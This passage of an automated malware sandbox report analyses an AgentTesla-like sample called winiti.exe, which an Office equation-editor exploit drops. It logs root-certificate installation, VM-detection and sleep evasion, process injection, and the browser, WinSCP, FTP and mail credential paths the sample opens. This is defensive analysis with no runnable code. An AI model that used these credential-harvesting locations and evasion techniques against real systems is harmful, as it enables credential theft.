Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VtoD4klVEdWHcS8xeB.cs	High entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X1lGeNtrqa9RypnK1A.cs	High entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, xVUQskdyggVyKpAr72.cs	High entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, iRONNpzmxgNG0DqyUV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, pmR0LOkIxEnrctQD2X.cs	High entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, HJtwWsj8mZcgkhR8CY.cs	High entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, B5YNRDX6ACF01eAiIM.cs	High entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VFbsN9QyklDZced5yE.cs	High entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, U53X4duKhnr0sejxel.cs	High entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, gBacBfc2y4FvbqjllAT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, l6A1ftxPNHNC6cEnNj.cs	High entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, gT12ZpCTTqeGReUGbk.cs	High entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, OLaIZShKLuCmYa6fj7.cs	High entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\winiti.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\winiti.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\winiti.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 2460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 5B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 80E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 5380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 90E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 57B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 2230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 600000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

Window / User API: threadDelayed 9685

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3264	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3524	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3584	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3584	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3588	Thread sleep count: 9685 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3588	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3688	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\winiti.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\winiti.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\winiti.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Thread delayed: delay time: 100000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\winiti.exe

Memory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	Queries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Queries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\winiti.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\winiti.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

